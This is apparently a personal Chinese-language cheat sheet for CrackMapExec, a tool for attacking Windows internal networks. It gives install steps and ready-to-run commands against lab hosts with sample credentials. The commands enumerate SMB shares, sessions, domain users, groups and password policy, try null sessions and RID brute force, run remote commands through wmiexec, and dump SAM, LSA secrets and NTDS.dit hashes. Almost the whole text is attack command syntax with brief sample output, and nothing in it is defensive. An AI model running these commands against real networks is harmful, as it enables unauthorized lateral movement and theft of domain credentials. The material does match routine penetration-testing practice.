windows内网渗透之CrackMapExec

简介

 cme（CrackMapExec）内网渗透利器

实际使用

安装

最方便：

apt-get install crackmapexec

避免有坑：

apt-get install -y libssl-dev libffi-dev python-dev build-essential
pip install --user pipenv
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec && pipenv install
pipenv shell
python setup.py install

 常用命令总结

####　列出共享
cme smb 192.168.127.235 -u admin -p 'abc123456' --shares
####　列出会话
cme smb 192.168.127.235 -u admin -p 'abc123456' --sessions
####　列出磁盘信息
cme smb 192.168.127.235 -u admin -p 'abc123456' --disks
####　列出登录的用户
cme smb 192.168.127.235 -u admin -p 'abc123456' --loggedon-users
####　列出域用户
cme smb 192.168.127.235 -u admin -p 'abc123456' --users
####　根据唯一的RID列出所有的用户
cme smb 192.168.127.235 -u admin -p 'abc123456' --rid-brute
####　列出域组
cme smb 192.168.127.235 -u admin -p 'abc123456' --groups
####  列出本地组
cme smb 192.168.127.235 -u admin -p 'abc123456' --local-groups
####　列出域密码策略
cme smb 192.168.127.235 -u admin -p 'abc123456' --pass-pol
####　尝试空会话
cme smb 192.168.127.235 -u '' -p ''
####　列出指定域信息
cme smb 192.168.127.235 -u admin -p 'abc123456' -d LABNET
####　列出ntds.dit的历史信息
cme smb 192.168.127.235 -u admin -p 'abc123456' --ntds-history
####　爬行C盘目录信息
cme smb 192.168.127.235 -u admin -p 'abc123456' --spider C\$ --pattern txt
cme smb 192.168.127.235 -u admin -p 'abc123456' --spider C\$

####　远程执行命令
cme smb 192.168.127.235 -u admin -p 'abc123456' -X '$PSVersionTable' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'abc123456' -X '$set' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'abc123456' -X '$whoami' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'abc123456' -X 'whoami' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'abc123456' -X 'ipconfig /all' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'abc123456' -X 'tasklist /svc' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'abc123456' -x ipconfig

语句格式

基本探测

crackmapexec protocol test.com
crackmapexec protocol 192.168.3.70/24
crackmapexec protocol 192.168.3.70-77  192.168.4.1-20
crackmapexec protocol ~/ip.txt

携带认证信息

crackmapexec protocol 192.168.3.70 -u administrator -p 'abc12345'
crackmapexec protocol 192.168.3.70 -u='-administrator' -p='-abc12345'
//第一个字母为-的特殊情况语句

协议探测

#crackmapexec  smb 192.168.3.73-76

SMB         192.168.3.73    445    SRV-WEB-KIT      
[*] Windows Server 2012 R2 Datacenter 9600 
(name:SRV-WEB-KIT) (domain:rootkit.org) 
(signing:False) (SMBv1:True)
SMB         192.168.3.76    445    
PC-MICLE-KIT     [*] Windows 8.1 Pro 9600 
(name:PC-MICLE-KIT) (domain:rootkit.org) 
(signing:False) (SMBv1:True)

执行命令

crackmapexec smb 192.168.3.144 -u administrator -p 'abc12345' -x whoami

凭证获取

crackmapexec smb 192.168.3.144 -u administrator -p 'abc12345' --sam
crackmapexec smb 192.168.3.73-144 -u administrator -p 'abc12345' --lsa
crackmapexec smb 192.168.3.73-144 -u administrator -p 'abc12345' --ntds
crackmapexec smb 192.168.3.73-144 -u administrator -p 'abc12345' --ntds vss
crackmapexec smb 192.168.3.73-144 -u administrator -p 'abc12345' --ntds-history

Sessions枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --sessions

共享枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --shares

磁盘枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --disk

登录用户枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --loggedon-users

RID爆破枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --rid-brute

域用户枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --users

组枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --groups

本地组枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --local-groups

域密码策略枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --pass-pol

记录一下方便以后查看。有一些命令是网上查的。